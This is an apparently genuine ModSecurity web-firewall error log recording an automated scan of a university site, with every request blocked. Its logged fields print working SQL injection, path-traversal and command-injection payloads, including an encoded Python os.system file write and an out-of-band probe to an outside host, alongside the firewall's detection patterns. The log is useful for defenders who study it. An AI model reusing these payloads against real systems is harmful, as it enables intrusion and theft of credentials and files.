[Tue Aug 29 11:35:22.349473 2023] [:error] [pid 1387] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:categories. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ~ found within ARGS:categories: ~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/servlet/codesettree"] [unique_id "ZO11isCo-f0AAAVr@R8AAAAZ"]
[Tue Aug 29 11:35:24.330733 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://notburpcollaborator.net found within TX:1: notburpcollaborator.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO11jMCo-f0AAATavxMAAAAg"]
[Tue Aug 29 11:35:24.349018 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:apis. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:apis: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/api/console/api_server"] [unique_id "ZO11jMCo-f0AAASHh-kAAAAD"]
[Tue Aug 29 11:35:25.312210 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: (SELECT 3 FROM (SELECT SLEEP(7))enz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11jcCo-f0AAASPDQoAAAAS"]
[Tue Aug 29 11:35:25.336643 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'orQN'='orQN found within ARGS:username: test' AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND 'orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11jcCo-f0AAASHh-sAAAAD"]
[Tue Aug 29 11:35:26.341582 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',''); found within ARGS:password: g','');import os;os.system('6563686f20224d6c566b6547744f4e7a464f597a41344e6d51344e477846633278795630644c4f45315022207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574'.decode('hex'))#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/webadmin/tools/unixlogin.php"] [unique_id "ZO11jsCo-f0AAAUNaosAAABF"]
[Tue Aug 29 11:35:27.344288 2023] [:error] [pid 1300] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id[]: 1 AND (SELECT 321 FROM (SELECT(SLEEP(6)))je)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAAUUZ@oAAABK"]
[Tue Aug 29 11:35:27.347824 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:groupsIds[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:groupsIds[]: 1) AND (SELECT 3066 FROM (SELECT(SLEEP(5)))CEHy)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11j8Co-f0AAAUDQVMAAAA7"]
[Tue Aug 29 11:35:28.299208 2023] [:error] [pid 1248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:username: admin' AND 4719=4719-- GZHh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/banker/index.php"] [unique_id "ZO11kMCo-f0AAATge@MAAAAl"]
[Tue Aug 29 11:35:29.304342 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 1 UNION ALL SELECT NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11kcCo-f0AAATWYU8AAAAa"]
[Tue Aug 29 11:35:29.328875 2023] [:error] [pid 1382] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:clientId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:clientId: {{id}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/asyncrenderer/{{url}}"] [unique_id "ZO11kcCo-f0AAAVmuMQAAAAT"]
[Tue Aug 29 11:35:30.336412 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat${ifs}/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/network_test.php"] [unique_id "ZO11ksCo-f0AAAPDoTYAAAAP"]
[Tue Aug 29 11:35:32.304454 2023] [:error] [pid 1391] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../home/talariuser/www/app/webroot/files/2UdxkuPYBktPaU9ruKB9Vm8sOw9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/Collector/appliancesettings/applianceSettingsFileTransfer"] [unique_id "ZO11lMCo-f0AAAVvlIUAAAAe"]
[Tue Aug 29 11:35:32.316864 2023] [:error] [pid 1402] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/nette.micro/"] [unique_id "ZO11lMCo-f0AAAV6LBkAAAAI"]
[Tue Aug 29 11:35:32.333514 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:data_target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:data_target: vote_score = 1 AND (SELECT 3 FROM (SELECT(SLEEP(6)))gwe)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAAUDQV0AAAA7"]
[Tue Aug 29 11:35:32.334155 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id_form. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id_form: 1 UNION ALL SELECT NULL,NULL,md5(999999999),NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAAUR88wAAABI"]
[Tue Aug 29 11:35:33.375138 2023] [:error] [pid 1384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:arp_template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:arp_template_id: 1 AND (SELECT 8948 FROM (SELECT(SLEEP(6)))iIic)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lcCo-f0AAAVoCCYAAAAY"]
[Tue Aug 29 11:35:34.362914 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: test' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11lsCo-f0AAATWYVsAAAAa"]
[Tue Aug 29 11:35:34.373887 2023] [:error] [pid 1248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/cab-fare-calculator/tblight.php"] [unique_id "ZO11lsCo-f0AAATge@8AAAAl"]
[Tue Aug 29 11:35:35.342613 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11l8Co-f0AAASHiBAAAAAD"]
[Tue Aug 29 11:35:35.380016 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:queriesCnt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:queriesCnt:  cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO11l8Co-f0AAAVPX6IAAAAF"]
[Tue Aug 29 11:35:35.381028 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:fingerprint. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:fingerprint: (SELECT SLEEP(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11l8Co-f0AAATOBBgAAAAH"]
[Tue Aug 29 11:36:24.605032 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11yMCo-f0AAAQSWQYAAAA0"]
[Tue Aug 29 11:36:24.670458 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Rule 7fe1c67ac3c8 [id "981246"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "239"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "mbkm.unla.ac.id"] [uri "/xmlpserver/services/XMLPService"] [unique_id "ZO11yMCo-f0AAATQXmUAAAAO"]
[Tue Aug 29 11:36:25.263793 2023] [:error] [pid 1409] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ); --\\x22 found within ARGS:table_name: pg_user\\x22; select pg_sleep(6); --\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/api/v2/open/rowsInfo"] [unique_id "ZO11ycCo-f0AAAWBBP4AAAAB"]
[Tue Aug 29 11:36:26.052615 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../..// found within ARGS:file_name: ../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/tsaupload.cgi"] [unique_id "ZO11ysCo-f0AAAUbg6oAAABQ"]
[Tue Aug 29 11:36:27.033643 2023] [:error] [pid 1436] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11y8Co-f0AAAWcCP4AAAAL"]
[Tue Aug 29 11:36:28.368226 2023] [:error] [pid 1450] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:true_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:true_path: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php/Pan/ShareUrl/downloadSharedFile"] [unique_id "ZO11zMCo-f0AAAWquoUAAAAX"]
[Tue Aug 29 11:36:28.431971 2023] [:error] [pid 1446] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/ccmivr/IVRGetAudioFile.do"] [unique_id "ZO11zMCo-f0AAAWmodYAAAAS"]
[Tue Aug 29 11:36:30.432803 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:folder: ../../../../../../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11zsCo-f0AAAV9bzEAAAAA"]
[Tue Aug 29 11:36:32.424410 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110MCo-f0AAAV9bzgAAAAA"]
[Tue Aug 29 11:36:33.425366 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110cCo-f0AAAV9bzkAAAAA"]
